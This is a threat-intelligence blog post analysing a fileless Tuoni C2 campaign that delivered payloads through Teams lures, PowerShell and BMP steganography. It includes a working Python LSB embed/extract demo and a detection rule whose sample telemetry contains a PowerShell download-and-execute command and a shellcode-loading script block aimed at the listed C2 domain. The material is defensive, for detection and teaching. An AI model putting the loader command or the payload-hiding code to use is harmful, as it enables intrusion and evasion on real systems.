Hidden in Plain Sight: Fileless Tuoni C2 Malware Uses Images and AI to Infiltrate U.S. Real Estate Firms

Executive overview

In early January 2026, security researchers disclosed a highly sophisticated, stealth-focused malware campaign leveraging the Tuoni command-and-control (C2) framework. The operation specifically targeted U.S.-based real estate organizations and demonstrated advanced tradecraft, including fileless execution, steganography, in-memory reflective loading, and AI-assisted obfuscation.

The attack did not rely on traditional malware binaries. Instead, it abused trusted tools (PowerShell), common collaboration platforms (Microsoft Teams), and benign-looking image files to evade detection. The campaign was stopped before full compromise, but it highlights a serious shift toward memory-only, socially engineered intrusions aimed at enterprise environments.


What is Tuoni C2?

Tuoni is a modular post-exploitation and command-and-control framework originally designed for red-team operations and adversary simulation. In malicious hands, it functions as a full-featured C2 platform capable of:

  • Deploying lightweight agents directly into memory
  • Executing commands remotely
  • Harvesting credentials
  • Performing lateral movement
  • Deploying secondary payloads such as ransomware or data exfiltration tools

Tuoni is attractive to attackers because:

  • It supports fileless execution
  • It blends into normal system activity
  • It allows custom loaders, which attackers can heavily obfuscate
  • It can be adapted quickly using AI-generated or dynamically assembled code

Who was targeted and why it matters

Targeted industry

  • U.S. real estate sector
  • Specifically, a large enterprise-level real estate firm

Why real estate?

Real estate organizations often:

  • Handle high-value financial transactions
  • Store sensitive personal and financial data
  • Rely heavily on third-party vendors and contractors
  • Use collaboration platforms extensively
  • Operate with mixed IT maturity across subsidiaries and offices

This makes them attractive for:

  • Credential theft
  • Business email compromise (BEC)
  • Ransomware staging
  • Financial fraud and wire transfer abuse

How the attack worked (step-by-step)

1. Social engineering via collaboration tools

Attackers initiated contact through Microsoft Teams, impersonating:

  • A vendor
  • An IT support contact
  • A business partner

The message was crafted to appear urgent and legitimate, instructing the victim to run a PowerShell command to “fix” an issue or “verify” access.

This step bypassed many technical defenses by exploiting human trust.


2. PowerShell-based initial loader

Once executed, the PowerShell command:

  • Downloaded a remote script from an attacker-controlled domain
  • Avoided dropping executable files to disk
  • Used native Windows functionality only

Because PowerShell is a trusted administrative tool, this activity often blends in with legitimate IT operations.


3. Steganography inside image files

Instead of downloading malware directly, the script retrieved a BMP image file.

Inside this image:

  • Malicious shellcode was hidden within pixel data
  • The image appeared harmless to basic scanners
  • No suspicious executable headers were present

The PowerShell loader parsed the image bytes in memory, recovered the hidden payload from the pixel data, and never wrote the decoded result to disk.

This technique evades:

  • Signature-based antivirus
  • Email and file gateway scanning
  • Simple sandbox analysis

It does not, on its own, evade controls that watch what the process does next: a script that reads an image and then allocates executable memory is still visible to script block logging and EDR memory monitoring.

4. Fileless, in-memory execution

The extracted payload was:

  • Loaded reflectively into memory
  • Never written to disk
  • Executed inside a legitimate process context

This is known as fileless malware execution.

Benefits for attackers:

  • Minimal forensic artifacts on disk
  • Reduced chance of detection by file-based scanning
  • No dropped file to quarantine or hash

The trade-off is that a purely in-memory implant does not survive a reboot; an attacker who wants to stay must add a separate persistence mechanism, which in this case never happened.

5. Tuoni agent deployment

Once active, the in-memory Tuoni agent attempted to:

  • Establish outbound C2 communication
  • Await further instructions
  • Prepare for credential harvesting and lateral movement
  • Potentially stage ransomware or data theft

Security controls interrupted execution before these actions completed.
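As an added example (not code from the campaign, from Tuoni, or from the researchers' report), the following Python shows the mechanics behind steps 2 to 4: how a payload rides in the pixel data of an ordinary 24-bit BMP using least-significant-bit (LSB) steganography, how a loader pulls it back out of the image bytes without touching disk, and why whole-file entropy barely moves while the LSB plane changes completely. The cover image, the length-prefixed one-bit-per-byte encoding and the pseudo-random stand-in payload are all constructed assumptions; the real loader's encoding is not published on this page.

```python
"""
LSB steganography in a 24-bit BMP: hide, recover, and measure.
Added example; the cover, the encoding scheme (4-byte LE length, then payload,
one bit per pixel byte) and the payload are constructed for illustration.
"""
import math
import random
import struct
from collections import Counter

FILE_HEADER = 14
INFO_HEADER = 40
PIXEL_OFFSET = FILE_HEADER + INFO_HEADER  # 54 bytes of headers before pixels


def make_bmp(width, height, pixel_fn):
    """Build an uncompressed 24-bit BMP; pixel_fn(x, y) returns one grey level."""
    row_pad = (4 - (width * 3) % 4) % 4  # BMP rows are padded to 4 bytes
    rows = []
    for y in range(height):
        row = bytearray()
        for x in range(width):
            v = pixel_fn(x, y) & 0xFF
            row += bytes((v, v, v))  # B, G, R
        rows.append(bytes(row) + b"\x00" * row_pad)
    pixels = b"".join(rows)
    file_hdr = struct.pack("<2sIHHI", b"BM", PIXEL_OFFSET + len(pixels), 0, 0, PIXEL_OFFSET)
    info_hdr = struct.pack("<IiiHHIIiiII", INFO_HEADER, width, height, 1, 24, 0,
                           len(pixels), 2835, 2835, 0, 0)
    return file_hdr + info_hdr + pixels


def pixel_data(bmp):
    """Locate the pixel array via the offset field at byte 10, as a loader would."""
    if bmp[:2] != b"BM":
        raise ValueError("not a BMP")
    offset = struct.unpack_from("<I", bmp, 10)[0]
    return offset, bmp[offset:]


def embed(bmp, payload):
    """Write len(payload) as 4 LE bytes, then payload, into the LSB of each pixel byte."""
    offset, data = pixel_data(bmp)
    data = bytearray(data)
    blob = struct.pack("<I", len(payload)) + payload
    if len(blob) * 8 > len(data):
        raise ValueError("cover too small for payload")
    for i in range(len(blob) * 8):
        bit = (blob[i >> 3] >> (7 - (i & 7))) & 1
        data[i] = (data[i] & 0xFE) | bit
    return bmp[:offset] + bytes(data)  # headers untouched, so the file still "is" an image


def extract(bmp):
    """Recover hidden bytes; rejects a length field that overruns the pixel array."""
    _, data = pixel_data(bmp)

    def read(start_bit, n):
        out = bytearray()
        for b in range(n):
            v = 0
            for k in range(8):
                v = (v << 1) | (data[start_bit + 8 * b + k] & 1)
            out.append(v)
        return bytes(out)

    length = struct.unpack("<I", read(0, 4))[0]
    if 32 + length * 8 > len(data):
        raise ValueError("length field exceeds pixel data; not this encoding")
    return read(32, length)


def shannon_entropy(symbols):
    """Bits per symbol over any iterable of hashable symbols."""
    counts = Counter(symbols)
    if len(counts) < 2:
        return 0.0
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def file_entropy(bmp):
    """Whole-file byte entropy: what a naive 'high-entropy image' hunt measures."""
    return shannon_entropy(bmp)


def lsb_plane_entropy(bmp, window=4096):
    """Entropy of the LSBs of the first `window` pixel bytes, where a length-prefixed payload starts."""
    _, data = pixel_data(bmp)
    return shannon_entropy(b & 1 for b in data[:window])


# Constructed smooth cover: grey levels that are multiples of 4, so the LSB plane is flat.
COVER = make_bmp(128, 64, lambda x, y: ((x + 2 * y) % 64) * 4)
# Constructed stand-in for an encrypted stage (real loaders hide shellcode here).
PAYLOAD = bytes(random.Random(2026).getrandbits(8) for _ in range(256))
STEGO = embed(COVER, PAYLOAD)

if __name__ == "__main__":
    assert extract(STEGO) == PAYLOAD
    print(f"file entropy  cover={file_entropy(COVER):.2f}  stego={file_entropy(STEGO):.2f}")
    print(f"LSB entropy   cover={lsb_plane_entropy(COVER):.2f}  stego={lsb_plane_entropy(STEGO):.2f}")
```

The whole-file figure stays around six bits for both images, because 256 hidden bytes are a rounding error against 24 KB of pixels; only the LSB plane jumps from flat to noisy. The caveat is that a real photograph's LSB plane is already noisy from sensor noise, so this statistic produces false positives on ordinary pictures and is best used as a triage signal alongside the behavioural telemetry (an image fetch followed by executable memory allocation) rather than on its own.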


Role of AI in the campaign

Analysis of the loader code suggested:

  • Dynamically assembled logic
  • Inconsistent formatting and variable naming
  • Rapid mutation between executions

These traits are consistent with AI-assisted code generation (the same signature can also come from conventional obfuscation frameworks, so treat the attribution as an assessment rather than a certainty), likely used to:

  • Evade static detection
  • Change execution flow
  • Reduce reuse of known malicious patterns

AI was not “autonomous” in the attack, but it lowered development effort and increased evasiveness.


Impact assessment

Confirmed impact

  • No confirmed data exfiltration
  • No ransomware deployment
  • No persistence mechanisms established
  • Attack was contained at the execution stage

Potential impact if successful

Had the attack not been stopped:

  • Domain credentials could have been stolen
  • Lateral movement across the network was likely
  • Financial systems could have been accessed
  • Ransomware or extortion campaigns could have followed

Indicators of compromise (IOCs)

Network indicators

  • Domain: kupaoquan[.]com
    • Used for payload hosting and C2 communication

File and execution indicators

  • Unexpected BMP image downloads followed by PowerShell activity
  • PowerShell reading image files and allocating executable memory
  • Reflective loading of DLLs without disk artifacts
  • Suspicious in-memory module often referenced as TuoniAgent.dll

Behavioral indicators

  • Microsoft Teams messages requesting script execution
  • PowerShell spawned from Teams, Outlook, or browser processes
  • Outbound connections from processes that normally have no reason to reach the internet, such as PowerShell started from a chat client
  • Large memory allocations followed by thread injection

Defensive lessons learned

Key takeaways

  1. Fileless malware is now mainstream
  2. Images are no longer “safe” file types
  3. Social engineering bypasses most technical controls
  4. Memory-based detection is critical
  5. AI is accelerating attacker innovation

Recommended mitigation strategies

Endpoint and system hardening

  • Enable full PowerShell logging (script block logging, module logging and command-line auditing)
  • Enforce Constrained Language Mode where possible; it blocks the .NET and Win32 interop calls a memory loader depends on
  • Restrict reflective loading and memory execution with application control (WDAC or AppLocker) and EDR memory-protection features, and keep AMSI scanning of script content enabled
  • Monitor for unusual executable memory allocations and thread creation inside script hosts

Network security

  • Block known malicious domains at DNS level
  • Monitor outbound traffic from user processes
  • Alert on unusual C2 beaconing patterns

User awareness

  • Train employees never to run scripts from chat messages
  • Conduct Teams-based phishing simulations
  • Reinforce verification of IT or vendor requests

Detection engineering

  • Hunt for image files whose entropy does not fit their format (an uncompressed BMP should be low-entropy; JPEG and PNG are high-entropy by design, so whole-file entropy alone is a noisy signal)
  • Monitor PowerShell downloading or reading image formats, especially when followed by memory allocation or thread creation
  • Correlate chat activity with process execution (PowerShell whose parent is the Teams client)
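The behavioural indicators listed earlier and the detection-engineering points above reduce to one correlation: a PowerShell process with an unusual parent, a script block that fetches an image and then touches memory-execution primitives, and an outbound connection the host has no business making. The following Python is an added example of that correlation (not a rule from the report, from Tuoni, or from any vendor product). It assumes PowerShell script block logging (Event ID 4104) and Sysmon-style process and network events, flattened here into dictionaries; the events, process names, PIDs, allowlist and the intranet host are constructed. The only indicator taken from the page is the domain kupaoquan[.]com.

```python
"""
Correlation rule over constructed endpoint telemetry for an image-steganography
PowerShell loader. Added example; the event shapes approximate Sysmon process
creation (EID 1), network connection (EID 3) and PowerShell script blocks (EID 4104).
"""
import re
from collections import defaultdict

# Parents from which an administrator does not normally launch PowerShell.
SUSPICIOUS_PARENTS = {"ms-teams.exe", "teams.exe", "outlook.exe",
                      "chrome.exe", "msedge.exe", "firefox.exe"}
# A URL ending in an image extension inside a script block.
IMAGE_FETCH = re.compile(r"https?://\S+\.(bmp|png|jpg|jpeg|gif)\b", re.I)
# Primitives a loader needs to turn decoded pixel bytes into running code.
MEMORY_PRIMITIVES = re.compile(
    r"VirtualAlloc|VirtualProtect|CreateThread|Marshal\]::Copy|"
    r"GetDelegateForFunctionPointer|\[Reflection\.Assembly\]::Load", re.I)
ALLOWED_HOSTS = {"www.powershellgallery.com", "intranet.example.invalid"}  # constructed allowlist
KNOWN_BAD_HOSTS = {"kupaoquan.com"}  # from the report's IOC list


def evaluate(events, threshold=2):
    """Return {pid: sorted rule names} for powershell.exe processes hitting >= threshold rules."""
    hits = defaultdict(set)
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process_create" and ev["image"].lower() == "powershell.exe":
            if ev["parent_image"].lower() in SUSPICIOUS_PARENTS:
                hits[pid].add("R1 powershell spawned by chat/mail/browser process")
        elif ev["type"] == "script_block":
            if IMAGE_FETCH.search(ev["text"]) and MEMORY_PRIMITIVES.search(ev["text"]):
                hits[pid].add("R2 image download combined with memory-execution primitives")
        elif ev["type"] == "network_connect" and ev["image"].lower() == "powershell.exe":
            host = ev["dest_host"].lower()
            if host not in ALLOWED_HOSTS:
                hits[pid].add("R3 powershell outbound to non-allowlisted host")
            if host in KNOWN_BAD_HOSTS:
                hits[pid].add("R4 connection to known C2 domain")
    return {pid: sorted(rules) for pid, rules in hits.items() if len(rules) >= threshold}


# Constructed telemetry: one malicious chain and two benign PowerShell uses.
EVENTS = [
    # Teams -> PowerShell -> BMP fetch -> decode into executable memory -> C2
    {"type": "process_create", "pid": 4120, "image": "powershell.exe",
     "parent_image": "ms-teams.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"iex (iwr https://kupaoquan.com/s)\""},
    {"type": "script_block", "pid": 4120,
     "text": "$img=(iwr 'https://kupaoquan.com/img/photo.bmp').Content;"
             "$sc=Decode $img;$p=[Win32]::VirtualAlloc(0,$sc.Length,0x3000,0x40);"
             "[Runtime.InteropServices.Marshal]::Copy($sc,0,$p,$sc.Length);"
             "[Win32]::CreateThread(0,0,$p,0,0,0)"},
    {"type": "network_connect", "pid": 4120, "image": "powershell.exe",
     "dest_host": "kupaoquan.com", "dest_port": 443},
    # Management agent refreshing a wallpaper: same file type, no memory primitives
    {"type": "process_create", "pid": 5210, "image": "powershell.exe",
     "parent_image": "AgentExecutor.exe", "cmdline": "powershell.exe -File Set-Wallpaper.ps1"},
    {"type": "script_block", "pid": 5210,
     "text": "iwr 'https://intranet.example.invalid/brand/wallpaper.bmp' -OutFile $env:TEMP\\w.bmp"},
    {"type": "network_connect", "pid": 5210, "image": "powershell.exe",
     "dest_host": "intranet.example.invalid", "dest_port": 443},
    # User opening a console from Explorer
    {"type": "process_create", "pid": 6001, "image": "powershell.exe",
     "parent_image": "explorer.exe", "cmdline": "powershell.exe"},
]

if __name__ == "__main__":
    for pid, rules in evaluate(EVENTS).items():
        print(f"ALERT pid={pid}")
        for r in rules:
            print(f"  {r}")
```

The wallpaper script downloads a BMP too, which is why R2 requires the memory primitives as well as the image fetch, and why the threshold is two rules rather than one: any single indicator here has a benign explanation, but a Teams-spawned shell that decodes an image into executable memory and then beacons out does not.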

Why this campaign matters

This Tuoni C2 operation represents a modern intrusion model:

  • No malware files
  • No obvious exploits
  • No persistence at first
  • Heavy reliance on human interaction and memory abuse

It shows how attackers are moving beyond traditional malware into stealthy, adaptable, low-noise operations that challenge conventional defenses.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.